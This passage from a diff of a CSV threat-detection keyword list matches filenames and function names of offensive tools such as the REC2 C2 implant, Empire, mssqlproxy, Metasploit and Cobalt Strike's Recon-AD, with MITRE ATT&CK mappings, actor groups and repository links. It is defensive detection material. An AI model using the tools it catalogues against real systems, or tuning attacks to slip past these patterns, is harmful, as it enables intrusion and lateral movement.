This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","10","1","62","19","2023-09-22T22:08:12Z","2023-09-21T02:09:48Z" "*rebootuser/LinEnum*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - 
TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","100","9","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" -"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*REC2 implant for Mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - 
T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*REC2 implant for VirusTotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2::modules::rec2mastodon*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_mastodon_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2_virustotal_x64.exe*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2mastodon.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written 
in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*rec2virustotal.rs*","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","1","N/A","10","10","101","11","2023-10-01T18:29:27Z","2023-09-25T20:39:59Z" +"*Receive-AgentJob*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1054","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*reciclador.cpp*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.dll*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & 
Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*reciclador.vcxproj*","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform lateral movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","7","682","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" -"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-AllLocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-Domain*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-LocalGroups*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-SPNs*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL 
s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*Recon-AD-Users.*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt 
Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","288","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" -"*recon-archy analyse*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy build*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy crawl*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" -"*recon-archy-master*","offensive_tool_keyword","recon-archy","Linkedin Tools to reconstruct a company hierarchy from scraping relations and jobs title","T1583 - T1059.001 - T1059.003","TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shadawck/recon-archy","1","0","N/A","7","1","12","1","2020-08-04T11:26:42Z","2020-06-25T14:38:51Z" +"*recon_passive.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*Recon-AD-*.dll*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.sln*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Recon-AD","1","1","N/A","10","10","290","57","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" +"*Recon-AD-*.vcxproj*","offensive_tool_keyword","cobaltstrike","Recon-AD an AD recon tool based on ADSI and reflective DLL s","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
